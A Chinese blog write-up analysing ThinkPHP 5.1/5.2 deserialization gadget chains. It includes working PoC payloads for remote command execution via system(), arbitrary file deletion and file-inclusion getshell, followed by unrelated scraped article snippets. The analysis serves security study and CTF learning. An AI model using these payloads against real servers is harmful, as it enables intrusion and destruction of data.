BerL1n

thinkphp5.1.x~5.2.x版本反序列化链挖掘分析

文章首发于先知社区https://xz.aliyun.com/t/6619

前言

之前看到关于thinkphp5反序列化链的分析以及不久前做的很多ctf赛题中都考到了反序列化链挖掘去利用的题目，并未进行分析，这里参考各位师傅的文章进行分析一下。。

5.1.x版本分析

这里先分析一下thinkphp5.1版本反序列化漏洞。

环境
thinkphp 5.1.38
php 7.2

漏洞挖掘思路
挖掘反序列化漏洞过程中，很多时候都是利用php中的魔术方法触发反序列化漏洞。但如果漏洞触发代码不在魔法函数中，而在一个类的普通方法中。并且魔法函数通过属性（对象）调用了一些函数，恰巧在其他的类中有同名的函数（pop链）。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。
一般来说，反序列化的利用点为：
__construct构造函数每次创建对象都会调用次方法

__destruct析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行

__wakeupunserialize()执行前会检查是否存在一个__wakeup()方法，如果存在会先调用

__toString 一个对象被当字符串用的时候就会去执行这个对象的__toString

__wakeup()执行漏洞：一个字符串或对象被序列化后，如果其属性被修改，则不会执行__wakeup()函数，这也是一个绕过点。

挖掘的思路很多师傅都写了，所以我就直接从poc就细节方面去直接分析一下整个链的利用过程。

POC


namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        $this->append = ["lin"=>["calc.exe","calc"]];
        $this->data = ["lin"=>new Request()];
    }
}
class Request
{
    protected $hook = [];
    protected $filter = "system";
    protected $config = [
        // 表单ajax伪装变量
        'var_ajax'         => '_ajax',  
    ];
    function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>'lin'];
        $this->hook = ["visible"=>[$this,"isAjax"]];
    }
}


namespace think\process\pipes;

use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
namespace think\model;

use think\Model;

class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>

漏洞利用过程

在寻找利用链时从php中的魔术方法入手，我们从/thinkphp/library/think/process/pipes/Windows.php的__destruct()方法入手。首先会触发poc里定义的__construct方法，然后触发同类下的__destruct()方法(就是前面说的windows类下的)，__construct方法定义files数组创建了一个Pivot对象，该对象继承Model类，然后会触发Model类中的__construct()方法，先知道这些就行，然后先看windows类这里触发的__destruct()方法

__destruct()里面调用了两个函数，一个关闭连接close()方法，忽略，然后我们跟进removeFiles()函数。

发现该方法是删除临时文件的。

namespace think\process\pipes;

use think\Process;

class Windows extends Pipes
{

    /** @var array */
    private $files = [];
    ......
    private function removeFiles()
    {
        foreach ($this->files as $filename) {   //遍历files数组中的[new Pivot()]
            if (file_exists($filename)) {    //若存在该文件名便删除文件
                @unlink($filename);
            }
        }
        $this->files = [];
    }
....
}

这里调用了一个$this->files，而且这里的变量$files是可控的。所以这里存在一个任意文件删除的漏洞。

POC：

namespace think\process\pipes;

class Pipes{

}

class Windows extends Pipes
{
private $files = [];

public function __construct()
{
$this->files=['需要删除文件的路径'];
}
}

echo base64_encode(serialize(new Windows()));

这里只需要一个反序列化漏洞的触发点，若后期开发存在反序列化漏洞，便可以实现任意文件删除。
回归正题，
在removeFiles()中使用了file_exists对$filename进行了处理。我们进入file_exists函数可以知道，$filename会被作为字符串处理。

而__toString 当一个对象在反序列化后被当做字符串使用时会被触发，我们通过传入一个对象来触发__toString 方法。搜索__toString方法。因为前面我们传入的是一个Pivot对象，所以此时便会触发__toString方法。

这里有很多地方用到，我们跟进\thinkphp\library\think\model\concern\Conversion.php的Conversion类的__toString()方法，这里调用了一个toJson()方法。
然后跟进toJson()方法。

  /**
     * 转换当前数据集为JSON字符串
     * @access public
     * @param  integer $options json参数
     * @return string
     */
    public function toJson($options = JSON_UNESCAPED_UNICODE)
    {
        return json_encode($this->toArray(), $options);
    }

这里调用了toArray()方法，然后转换为json字符串，继续跟进toArray()。

public function toArray()
    {
        $item       = [];
        $hasVisible = false;

      ......
        // 追加属性（必须定义获取器）
        if (!empty($this->append)) {                  //在poc中$this->append = ["lin"=>["calc.exe","calc"]];
            foreach ($this->append as $key => $name) {  //遍历append，此时$key='lin',$name=["calc.exe","calc"]
                if (is_array($name)) {
                    // 追加关联对象属性
                    $relation = $this->getRelation($key);  //$relation=null,下面分析

                    if (!$relation) {
                        $relation = $this->getAttr($key);  
                        if ($relation) {
                            $relation->visible($name);
                        }
                    }
                    
            .......
    }

我们需要在toArray()函数中寻找一个满足$可控变量->方法(参数可控)的点，这里$append是可控的，这意味着$relation也可控，所以如果找到一个__call方法(调用类中不存在的方法会被执行)，并且该类没有visible方法，这是一个代码执行的点，具体后面分析。
该函数中调用一个getRelation()方法，另一个getAttr()方法，下面判断了变量$relation，若 !$relation，继续调用getAttr()方法，所以我们跟进这俩方法，看有没有可利用的点。
跟进getRelation()
在thinkphp\library\think\model\concern\RelationShip.php中，该方法位于RelationShip类中。

由于$key=lin，跳过第一个if，而$key也不在$this->relation中，返回空。然后调用了getAttr方法，我们跟进getAttr方法
在\thinkphp\library\think\model\concern\Attribute.php中，位于Attribute类中。

 public function getAttr($name, &$item = null)  //$name = $key = 'lin'
    {
        try {
            $notFound = false;
            $value    = $this->getData($name);  
        } catch (InvalidArgumentException $e) {
            $notFound = true;
            $value    = null;
        }

这里调用了一个getData()方法，继续跟进

  public function getData($name = null)   //$name = $key = 'lin'
    {
        if (is_null($name)) {    //$name 为空返回data
            return $this->data;
        } elseif (array_key_exists($name, $this->data)) {  //查找$name是否为data数组里的键名，因为data可控，在poc里定义为$this->data = ["lin"=>new Request()]; 所以存在
            return $this->data[$name];  //返回结果为new Request()
        } elseif (array_key_exists($name, $this->relation)) {
            return $this->relation[$name];  
        }
        throw new InvalidArgumentException('property not exists:' . static::class . '->' . $name);
    }

通过查看getData函数我们可以知道toArray()方法中的$relation的值为$this->data[$name]
toArray():

		if (!$relation) {
                        $relation = $this->getAttr($key);  //$relation = new Request()
                        if ($relation) {
                            $relation->visible($name);   //new Request()-> visible($name) ,$name = ["calc.exe","calc"] 所以就需要上面说的找一个__call代码执行点。
                        }
                    }

需要注意的一点是这里类的定义使用的是Trait而不是class。自 PHP 5.4.0 起，PHP 实现了一种代码复用的方法，称为 trait。通过在类中使用use 关键字，声明要组合的Trait名称。所以，这里类的继承要使用use关键字。

现在我们的可控变量有三个，

$files位于类Windows
$append位于类Conversion
$data位于类Attribute

windows类另行构造，所以我们现在需要一个同时继承了Attribute类和Conversion类的子类，在\thinkphp\library\think\Model.php中找到这样一个类

代码执行点分析

现在还缺少一个代码执行可导致RCE的点，需要满足一下条件
1.该类中没有”visible”方法
2.类中实现了__call方法
一般PHP中的__call方法都是用来进行容错或者是动态调用,所以一般会在__call方法中使用

__call_user_func($method, $args)

__call_user_func_array([$obj,$method], $args)

但是 public function __call($method, $args) 我们只能控制 $args,所以很多类都不可以用
经过查找发现/thinkphp/library/think/Request.php 中的 __call 使用了一个array取值的

public function __call($method, $args)
{
 if (array_key_exists($method, $this->hook)) {
 array_unshift($args, $this);
 return call_user_func_array($this->hook[$method], $args);
 }

 throw new Exception('method not exists:' . static::class . '->' . $method);
}

这里的 $hook是我们可控的,所以我们可以设计一个数组 $hook= {“visable”=>”任意method”}
但是这里有个 array_unshift($args, $this);会把$this放到$arg数组的第一个元素这样我们只能

call_user_func_array([$obj,"任意方法"],[$this,任意参数])
也就是
$obj->$func($this,$argv)

这种情况是很难执行命令的,但是Thinkphp作为一个web框架,
Request类中有一个特殊的功能就是过滤器 filter(ThinkPHP的多个远程代码执行都是出自此处)
所以可以尝试覆盖filter的方法去执行代码
在/thinkphp/library/think/Request.php中找到了filterValue()方法。

该方法调用了call_user_func函数，但$value参数不可控，如果能找到一个$value可控的点就好了。
发现input()满足条件，这里用了一个回调函数调用了filterValue，但参数不可控不能直接用

....
    public function input($data = [], $name = '', $default = null, $filter = '')
    {
        if (false === $name) {
            // 获取原始数据
            return $data;
        }
        ....
       // 解析过滤器
        $filter = $this->getFilter($filter, $default);

        if (is_array($data)) {
            array_walk_recursive($data, [$this, 'filterValue'], $filter);
          .....
        } else {
            $this->filterValue($data, $name, $filter);
        }
.....

所以接着找能控的函数点，这里找到了param函数，

   public function param($name = '', $default = null, $filter = '')
    {
         if (!$this->mergeParam) {
            $method = $this->method(true);

           .....

            // 当前请求参数和URL地址中的参数合并为一个数组。
            $this->param = array_merge($this->param, $this->get(false), $vars, $this->route(false));

            $this->mergeParam = true;
        }

        if (true === $name) {
            // 获取包含文件上传信息的数组
            $file = $this->file();
            $data = is_array($file) ? array_merge($this->param, $file) : $this->param;

            return $this->input($data, '', $default, $filter);
        }

        return $this->input($this->param, $name, $default, $filter);
    }

这里调用了input()函数，不过参数仍然是不可控的，所以我们继续找调用param函数的地方。找到了isAjax函数

public function isAjax($ajax = false)
    {
        $value  = $this->server('HTTP_X_REQUESTED_WITH');
        $result = 'xmlhttprequest' == strtolower($value) ? true : false;

        if (true === $ajax) {
            return $result;
        }

        $result           = $this->param($this->config['var_ajax']) ? true : $result;
        $this->mergeParam = false;
        return $result;
    }

在isAjax函数中，我们可以控制$this->config['var_ajax']，$this->config['var_ajax']可控就意味着param函数中的$name可控。param函数中的$name可控就意味着input函数中的$name可控。

而param函数可以获得$_GET数组并赋值给$this->param。

再回到input函数中

....
    public function input($data = [], $name = '', $default = null, $filter = '')
    {
        if (false === $name) {
            // 获取原始数据
            return $data;
        }
        ....
	     $data = $this->getData($data, $name);
        ....
       // 解析过滤器
        $filter = $this->getFilter($filter, $default);

        if (is_array($data)) {
            array_walk_recursive($data, [$this, 'filterValue'], $filter);
          .....
        } else {
            $this->filterValue($data, $name, $filter);
        }
.....

看一下$data = $this->getData($data, $name);
$name的值来自于$this->config['var_ajax']，我们跟进getData函数。

    protected function getData(array $data, $name)
    {
        foreach (explode('.', $name) as $val) {
            if (isset($data[$val])) {
                $data = $data[$val];
            } else {
                return;
            }
        }

        return $data;
    }

这里$data = $data[$val] = $data[$name]

然后跟进getFilter函数

    protected function getFilter($filter, $default)
    {
        if (is_null($filter)) {
            $filter = [];
        } else {
            $filter = $filter ?: $this->filter;
            if (is_string($filter) && false === strpos($filter, '/')) {
                $filter = explode(',', $filter);
            } else {
                $filter = (array) $filter;
            }
        }

        $filter[] = $default;

        return $filter;
    }

这里的$filter来自于$this->filter，我们需要定义一个带有$this->filter的函数

....
if (is_array($data)) {
            array_walk_recursive($data, [$this, 'filterValue'], $filter);
            ....

此时在input函数中的回调函数得知,filterValue.value的值为第一个通过GET请求的值input.data，而filterValue.key为GET请求的键input.name，并且filterValue.filters就等于input.filter的值。

到这里思路有了，回过头来看我们poc的利用过程，首先在上一步toArray()方法。创建了一个Request()对象，然后会触发poc里的__construct()方法，接着new Request()-> visible($name)，该对象调用了一个不存在的方法会触发__call方法，看一下__construct()方法内容：

 function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>'lin'];
        $this->hook = ["visible"=>[$this,"isAjax"]];
    }

  public function __call($method, $args)  //$method为不存在方法，$args为不存在方法以数组形式存的参数，此时$method = visible，$args = $name = ["calc.exe","calc"]
    {
        if (array_key_exists($method, $this->hook)) {    //查找键名$method是否存在数组hook中，满足条件
            array_unshift($args, $this);                 //将新元素插入到数组$args中，此时$args = [$this,"calc.exe","calc"]
            return call_user_func_array($this->hook[$method], $args);   //执行回调函数isAjax, ([$this,isAjax],[$this,"calc.exe","calc"])
        }

        throw new Exception('method not exists:' . static::class . '->' . $method);
    }

接着看isAjax方法的调用过程，

public function isAjax($ajax = false)
    {
       
	    .....
        $result = $this->param($this->config['var_ajax']) ? true : $result; 
        //这里$this->config['var_ajax'] = 'lin'
        $this->mergeParam = false;
        return $result;
    }

然后跟进param()方法

  public function param($name = '', $default = null, $filter = '') //$name = $this->config['var_ajax'] = 'lin'
    {
        if (!$this->mergeParam) {
            $method = $this->method(true);

            // 自动获取请求变量
            switch ($method) {
                case 'POST':
                    $vars = $this->post(false);
                    break;
                case 'PUT':
                case 'DELETE':
                case 'PATCH':
                    $vars = $this->put(false);
                    break;
                default:
                    $vars = [];
            }

            // 当前请求参数和URL地址中的参数合并为一个数组。
            $this->param = array_merge($this->param, $this->get(false), $vars, $this->route(false));

            $this->mergeParam = true;
        }

      .....
        return $this->input($this->param, $name, $default, $filter); //$this->param当前get请求参数数组('lin' => 'calc')、$name = $this->config['var_ajax'] = lin
    }

然后跟进input()方法

public function input($data = [], $name = '', $default = null, $filter = '')
    {         //当前请求参数数组'lin'=>'calc'、$name = $this->config['var_ajax']=lin
        if (false === $name) {
            // 获取原始数据
            return $data;
        }

        $name = (string) $name; //指定lin为字符串
        if ('' != $name) {
            // 解析name
            if (strpos($name, '/')) {
                list($name, $type) = explode('/', $name);
            }

            $data = $this->getData($data, $name);  //这里先跟进该函数，$data = $data[$val] = $data['lin'] = calc
             ......
             

            // 解析过滤器
        $filter = $this->getFilter($filter, $default);  //$filter[0=>'system',1=>$default]  ，这里先跟进该函数

        if (is_array($data)) {
            array_walk_recursive($data, [$this, 'filterValue'], $filter);    //回调函数filterValue ，跟进该函数，$data = filterValue.$value = calc 、 $filter = filterValue.$filters = [0->system,1->$default] 、 $name = filterValue.$key = 'lin'
          .....
        } else {
            $this->filterValue($data, $name, $filter);
        }

        if (isset($type) && $data !== $default) {
            // 强制类型转换
            $this->typeCast($data, $type);
        }

        return $data;
    }

  protected function getData(array $data, $name)//$data['lin'=>'calc'],$name = 'lin'
    {
        foreach (explode('.', $name) as $val) { //分割成数组['lin']
            if (isset($data[$val])) {
                $data = $data[$val]; // 此时$data = $data['lin'] = 'calc' ,回到上面input()
            } else {
                return;
            }
        }

        return $data;
    }

 protected function getFilter($filter, $default)  //$filter在poc里定义为system
    {
        if (is_null($filter)) {
            $filter = [];
        } else {  
            $filter = $filter ?: $this->filter;      //$filter = $this->filter = system
            if (is_string($filter) && false === strpos($filter, '/')) {
                $filter = explode(',', $filter);     //分隔为数组['system']
            } else {
                $filter = (array) $filter;
            }
        }

        $filter[] = $default;       //此时$filter[]为{ [0]=>"system" [1]=>$default }，回到上面Input()

        return $filter;   
    }

private function filterValue(&$value, $key, $filters)
    {
        $default = array_pop($filters);  //删除数组最后一个元素，此时$filters=$filter[0]=system

        foreach ($filters as $filter) {     //遍历数组
            if (is_callable($filter)) {     //验证变量名能否作为函数调用，system()
                // 调用函数或者方法过滤
                $value = call_user_func($filter, $value);    //执行回调函数system('calc');
            }

在public/index.php处可设一个触发点

最终在filterValue()方法处执行系统命令导致RCE。

利用链：

\thinkphp\library\think\process\pipes\Windows.php - > __destruct()

\thinkphp\library\think\process\pipes\Windows.php - > removeFiles()

Windows.php: file_exists()

thinkphp\library\think\model\concern\Conversion.php - > __toString()

thinkphp\library\think\model\concern\Conversion.php - > toJson()

thinkphp\library\think\model\concern\Conversion.php - > toArray()

thinkphp\library\think\Request.php - > __call()

thinkphp\library\think\Request.php - > isAjax()

thinkphp\library\think\Request.php - > param()

thinkphp\library\think\Request.php - > input()

thinkphp\library\think\Request.php - > filterValue()

5.2.x版本分析

5.1版本和5.2版本差别不大，但在5.2版本中不存在这样的一个__call方法，因此不能利用5.1版本中的方法，不过__call之前的方法仍然可以使用，这意味着我们需要重新找一个最终达成命令执行的函数调用或者另外找一个__call方法去代替5.1版本中的，这里分析一下师傅们的方法。

方法一：

这种方法是利用think\model\concern\Attribute类中的getValue方法中可控的一个动态函数调用的点，

$closure = $this->withAttr[$fieldName]; //$withAttr、$value可控，令$closure=system，
$value   = $closure($value, $this->data);//system('ls',$this->data)，命令执行

这里利用了system()的特性，system ( string $command [, int &$return_var ] ) : string，执行命令，输出和返回结果。第二个参数是可选的，用来得到命令执行后的状态码。这种方法比较容易理解。下面带着poc分析下利用方法，因为toArray()前面都一样就不讲了，先给出利用链。

 think\process\pipes\Windows->__destruct()
 think\process\pipes\Windows->removeFiles()
 think\model\concern\Conversion->__toString()
 think\model\concern\Conversion->toJson()
 think\model\concern\Conversion->toArray()
 think\model\concern\Attribute->getAttr()
 think\model\concern\Attribute->getValue()

整体大致没变，通过触发__destruct()方法中的removeFiles()，该函数内用了一个file_exists()方法处理对象实例时会当成字符串，从而触发__toString()，调用toJson() => toArray() => getAttr()，最后在getValue()处调用动态函数导致命令执行。由于2版本和1版本在 toArray()处有点不同，我们从这开始分析，
poc


namespace think\process\pipes {
    class Windows
    {
        private $files;
        public function __construct($files)
        {
            $this->files = [$files];
        }
    }
}

namespace think\model\concern {
    trait Conversion
    {    
    }

    trait Attribute
    {
        private $data;
        private $withAttr = ["lin" => "system"];

        public function get()
        {
            $this->data = ["lin" => "ls"];
        }
    }
}

namespace think {
    abstract class Model
    {
        use model\concern\Attribute;
        use model\concern\Conversion;
    }
}

namespace think\model{
    use think\Model;
    class Pivot extends Model
    {
        public function __construct()
        {
            $this->get();
        }
    }
}

namespace {

    $conver = new think\model\Pivot();
    $payload = new think\process\pipes\Windows($conver);
    echo urlencode(serialize($payload));
}
?>

think\model\concern\Conversion::toArray

public function toArray(): array
    {
        $item       = [];
        $hasVisible = false;

        foreach ($this->visible as $key => $val) {    
         //$this->visible默认值为空，无关函数，跳过            
         ......
        }

        foreach ($this->hidden as $key => $val) {          
        //$this->hidden默认值为空，无关函数，跳过
        ......
        }

        // 合并关联数据
        $data = array_merge($this->data, $this->relation); //在poc中给了$this->data=["lin" => "ls"],所以$data = ["lin" => "ls"]

        foreach ($data as $key => $val) {  //$key = lin,$val=ls
            if ($val instanceof Model || $val instanceof ModelCollection) { //判断$val是不是这两个类的实例，不是，跳过执行下一步
                // 关联模型对象
                if (isset($this->visible[$key])) {
                    $val->visible($this->visible[$key]);
                } elseif (isset($this->hidden[$key])) {
                    $val->hidden($this->hidden[$key]);
                }
                // 关联模型对象
                $item[$key] = $val->toArray();
            } elseif (isset($this->visible[$key])) {   //$this->visible[$key]值为空不存在，跳过
                $item[$key] = $this->getAttr($key);
            } elseif (!isset($this->hidden[$key]) && !$hasVisible) {  //符合
                $item[$key] = $this->getAttr($key); //跟进getAttr,
            }
        }
       ......
    }

think\model\concern\Attribute::getAttr

public function getAttr(string $name) //$name=$key='lin'
    {
        try {
            $relation = false;
            $value    = $this->getData($name); //跟进getData,得知$value='ls'
        } catch (InvalidArgumentException $e) {
            $relation = true;
            $value    = null;
        }

        return $this->getValue($name, $value, $relation);//此时$name=‘lin’ $value=‘ls’ $relation=false, 跟进getValue
    }

think\model\concern\Attribute::getData

public function getData(string $name = null) //$name='lin'
    {
        if (is_null($name)) {
            return $this->data;
        }

        $fieldName = $this->getRealFieldName($name);  //跟进getRealFieldName 得知$fieldName='lin'

        if (array_key_exists($fieldName, $this->data)) {//$this->data=['lin'=>'ls']
            return $this->data[$fieldName]; //返回'ls'，回到getAttr
        } elseif (array_key_exists($name, $this->relation)) {
            return $this->relation[$name];
        }

        throw new InvalidArgumentException('property not exists:' . static::class . '->' . $name);
    }

think\model\concern\Attribute::getRealFieldName

protected function getRealFieldName(string $name): string  //$name='lin'
    {
        return $this->strict ? $name : App::parseName($name); //$this->strict=$name='lin'
    }

$this->strict为判断是否严格字段大小写的标志，默认为true，因此getRealFieldName默认返回$name参数的值，回到getData看。

think\model\concern\Attribute::getValue

protected function getValue(string $name, $value, bool $relation = false)
    {                 //$name='lin' $value=‘ls’ $relation=false
        // 检测属性获取器
        $fieldName = $this->getRealFieldName($name);  //该函数默认返回$name='lin'=$fieldName 
        $method    = 'get' . App::parseName($name, 1) . 'Attr';  //拼接字符：getlinAttr

        if (isset($this->withAttr[$fieldName])) {  //withAttr可控['lin'=>'system']
            if ($relation) { //$relation=false
                $value = $this->getRelationValue($name);
            }

            $closure = $this->withAttr[$fieldName]; //$closure='system'
            $value   = $closure($value, $this->data);//system('ls',$this->data)，命令执行
        }
        .......
        return $value;
    }

最终在getValue处动态调用函数命令执行。

方法二：

这种方法跟上面基本一样，唯一不同的就是在getValue处利用tp自带的SerializableClosure调用，而不是上面找的system()。
\Opis\Closure可用于序列化匿名函数，使得匿名函数同样可以进行序列化操作。在Opis\Closure\SerializableClosure->__invoke()中有call_user_func函数，当尝试以调用函数的方式调用一个对象时，__invoke()方法会被自动调用。call_user_func_array($this->closure, func_get_args());
这意味着我们可以序列化一个匿名函数，然后交由上述的$closure($value, $this->data)调用，将会触发SerializableClosure.php的__invoke执行

$func = function(){phpinfo();};
$closure = new \Opis\Closure\SerializableClosure($func);
$closure($value, $this->data);// 这里的参数可以不用管

以上述代码为例，将调用phpinfo函数。
POC


namespace think;
require __DIR__ . '/vendor/autoload.php';
use Opis\Closure\SerializableClosure;

abstract class Model{
    private $data = [];
    private $withAttr = [];
    
    function __construct(){
        $this->data = ["lin"=>''];
    	# withAttr中的键值要与data中的键值相等
    	$this->withAttr = ['lin'=> new SerializableClosure(function(){system('ls');}) ];
    }
}


namespace think\model;
use think\Model;
class Pivot extends Model
{
}

namespace think\process\pipes;
use think\model\Pivot;
class Windows
{
    private $files = [];
    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}


echo urlencode(serialize(new Windows()));
?>

方法三：
这个方法相比前面有点鸡肋，利用条件可知路径能上传php文件。
方法就是与5.1版本相似，因为此版本移除了Reuqest类中的__call方法，所以师傅们又找了另一个可以用的__call方法，在\think\Db.php中存在__call方法。下面分析一下该方法。

POC


namespace think;
class App{
    protected $runtimePath;
    public function __construct(string $rootPath = ''){
        $this->rootPath = $rootPath;
        $this->runtimePath = "D:/phpstudy/PHPTutorial/WWW/thinkphp/tp5.2/";
        $this->route = new \think\route\RuleName();
    }
}
class Db{
    protected $connection;
    protected $config;
    function __construct(){
        $this->config = ['query'=>'\think\Url'];
        $this->connection = new \think\App();
    }
}
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        # append键必须存在，并且与$this->data相同
        $this->append = ["lin"=>[]];
        $this->data = ["lin"=>new \think\Db()];
    }
}
namespace think\route;
class RuleName{
}
namespace think\model;
use think\Model;
class Pivot extends Model
{
}
namespace think\process\pipes;
use think\model\Pivot;
class Windows
{
    private $files = [];
    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
//var_dump(new Windows());
echo urlencode(serialize(new Windows()));
?>

依然从toArray()说起，，

就用到这个地方前面没用到，poc里定义$this->append = ["lin"=>[]];，所以如上图，然后再看调用了一个appendAttrToArray方法，跟进

其实这里内容就是5.1版本toArray里的，只不过放在这个方法里了。具体调用方法和5.1基本一样，不再说了。
然后继续看触发的__call方法，在创建Db对象时同时会触发对象里的__construct()，其内容

function __construct(){
        $this->config = ['query'=>'\think\Url'];
        $this->connection = new \think\App();
    }

所以如下

查看think\Url::__construct

public function __construct(App $app, array $config = [])
    {
        $this->app    = $app;
        $this->config = $config;
       
        if (is_file($app->getRuntimePath() . 'route.php')) { 
            // 读取路由映射文件
            $app->route->import(include $app->getRuntimePath() . 'route.php');
        }
    }

在\think\Url.php中该构造器引入了RuntimePath下的route.php文件，利用条件就是上传一个带shell的
route.php就可以了。
$app为可控变量，直接修改$runtimePath的内容即可控制$app->getRuntimePath()的值，因为getRuntimePath()在think\App类中，所以在poc中构造了App类控制路径，这里会触发App类中的__construct方法。

在poc中构造App类

class App{
    protected $runtimePath;
    public function __construct(string $rootPath = ''){
        $this->rootPath = $rootPath;
        $this->runtimePath = "D:/phpstudy/PHPTutorial/WWW/thinkphp/tp5.2/";
        $this->route = new \think\route\RuleName();
    }
}

回过来看think\Url::__construct，路径和文件都有了，从而包含文件getshell。

总结了师傅们的poc：thinkphp5_poc

后记

关于tp反序列化漏洞最大的利用点就是在后期开发时要遇到可控的反序列化点，不然利用不了，不得不说师傅们都tql，各种挖掘思路层出不穷，原来并未分析过tp，这里有分析不当的还请师傅们指点，通过对上面pop链的研究，也加深了对thinkphp框架的理解2333。

参考文章：
https://www.anquanke.com/post/id/187332
https://www.anquanke.com/post/id/187819#h2-7
https://blog.csdn.net/qq_41809896/article/details/101575253
https://paper.seebug.org/1040/

你可能感兴趣的:(web安全,CTF)

ARM驱动学习之4小结 JT灬新一嵌入式 C++arm开发学习 linux
ARM驱动学习之4小结#include#include#include#include#include#defineDEVICE_NAME"hello_ctl123"MODULE_LICENSE("DualBSD/GPL");MODULE_AUTHOR("TOPEET");staticlonghello_ioctl(structfile*file,unsignedintcmd,unsignedlo
react-intl——react国际化使用方案苹果酱0567 面试题汇总与解析 java 开发语言中间件 spring boot 后端
国际化介绍i18n：internationalization国家化简称，首字母+首尾字母间隔的字母个数+尾字母，类似的还有k8s(Kubernetes)React-intl是React中最受欢迎的库。使用步骤安装#usenpmnpminstallreact-intl-D#useyarn项目入口文件配置//index.tsximportReactfrom"react";importReactDOMf
Linux CTF逆向入门蚁景网络安全 linux 运维 CTF
1.ELF格式我们先来看看ELF文件头，如果想详细了解，可以查看ELF的manpage文档。关于ELF更详细的说明：e_shoff：节头表的文件偏移量（字节）。如果文件没有节头表，则此成员值为零。sh_offset：表示了该section（节）离开文件头部位置的距离+-------------------+|ELFheader|---++--------->+-------------------
Windows安装ciphey编码工具，附一道ciscn编码题例 im-Miclelson CTF工具网络安全
TA是什么一款智能化的编码分析解码工具，对于CTF中复杂性编码类题目可以快速攻破。编码自动分析解码的神器。如何安装Windows环境Python3.864位（最新的版本不兼容，32位的也不行）PIP直接安装pipinstallciphey-ihttps://pypi.mirrors.ustc.edu.cn/simple/安装后若是出现报错请根据错误代码行数找到对应文件，r修改成rb即可。使用标准语
Web安全:Web体系架构存在的安全问题和解决方室程序员-张师傅前端安全 web安全前端
Web体系架构在提供丰富功能和高效服务的同时，也面临着诸多安全问题。这些问题可能涉及数据泄露、服务中断、系统被控制等多个方面，对企业和个人造成不可估量的损失。以下是对Web体系架构中存在的安全问题及解决方案的详细分析：Web体系架构存在的安全问题注入攻击SQL注入：攻击者通过在输入字段中插入恶意SQL代码，操控后台数据库，窃取、篡改或删除数据。OS命令注入：攻击者通过输入字段插入恶意代码，执行系统
2005年高考英语北京卷 - 阅读理解C 让文字更美
Howcouldwepossiblythinkthatkeepinganimalsincagesinunnaturalenvironments-mostlyforentertainmentpurposes-isfairandrespectful?我们怎么可能认为把动物关在非自然环境的笼子里——主要是为了娱乐目的——是公平和尊重的呢？Zooofficialssaytheyareconcernedab
CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移沧海一粟日尽其用算法安全 python
CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移1.题目2.解题思路2.1base64编码原理2.2解题思路2.2.1base64解码找规律2.2.2破解思路3.解题脚本4.flag5.附EASCII码表1.题目提示信息：7+1+0？格式bugku{xxxxx}密文：4nXna/V7t2LpdLI44mn0fQ==要求：破解密文获得flag2.解题思路2.1base64
CTF常见编码及加解密（超全）第二篇不会代码的小徐编码密码网络安全密码学预编码
HTML实体编码简述：字符实体是用一个编号写入HTML代码中来代替一个字符，在使用浏览器访问网页时会将这个编号解析还原为字符以供阅读。举例：highlighter-HTML明文：hello，world.十进制：hello，world.十六进制：hel
CTF——web方向学习攻略一则孤庸 CTF 网络安全 CTF
1计算机基础操作系统：熟悉Linux命令，方便使用Kali。网络技术：HCNA、CCNA。编程能力：拔高项，有更好。2web应用HTTP协议：必须掌握web开发框架web安全测试3数据库数据库基本操作SQL语句数据库优化4刷题
CTF——web总结 oliveira-time ctf web安全
解题思路做题先看源码关注可下载的资源(zip压缩包)抓包寻找可能存在的加密信息（base64）不管三七二十一先扫描目录再说ps：正常的应该是先扫描目录，然后发现后台进行爆破，发现爆破困难，然后去社工找其他信息。CTF——web个人总结_ctfweb-CSDN博客
VueTreeselect el-tree-select 多选小小并不小 Vue element js vue.js javascript
1、VueTreeselect是一个多选组件npminstall--save@riophae/vue-treeselect全部代码//importthecomponentimportTreeselectfrom'@riophae/vue-treeselect'//importthestylesimport'@riophae/vue-treeselect/dist/vue-treeselect.cs
ctf逆向解题——Bomb二进制炸弹 Funkypantss
BombPhase1在输入阶段将由文件输入的字符存储在input中，在phase1，该阶段将原字符串存储到rdi中，调用pases_1函数进行字符串比较。image进入phase1函数，该函数将原字符串rdi与预先设定的字符串“BorderrelationswithCanadahaveneverbeenbetter.”（存储在rsi中）进行比较，用于比较的函数是strings_not_equal，
学习笔记：FW内容安全概述 TKE_yinian
内容安全概述信息安全概述主要威胁关于防护简介内容安全威胁应用层威胁内容安全技术WEB安全应用安全入侵防御检测邮件安全数据安全网络安全反病毒全局环境感知沙箱检测信息安全概述•信息安全是对信息和信息系统进行保护，防止未授权的访问、使用、泄露、中断、修改、破坏并以此提供保密性、完整性和可用性。•为关键资产提供机密性、完整性和可用性（CIA三元组）保护是信息安全的核心目标。CIA（Confidential
【CTF】MISC常用工具集锦/使用方法简介不会代码的小徐 misc 网络安全测试工具
前言#MISC题型多变而且工具繁杂，因此自己花时间整理了一份工具列表，以便日后参考用流畅地阅读这篇博客，你可能需要：Python2.7.18+Python3.8+任何一个更高版本的Python，使用conda管理Linux虚拟机，kali即可流畅访问Google/GitHub等站点的网络通用工具#PuzzleSolver#专为misc手打造的瑞士军刀(?)，整合了多种脚本（base，字频分析，pn
网络安全（黑客）自学白帽子凯哥 web安全安全网络安全服务器网络
一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、怎样规划网络安全如果你是一
网络安全的相关比赛有哪些？需要掌握哪些必备技能？网安学习 web安全安全网络安全的相关比赛有哪
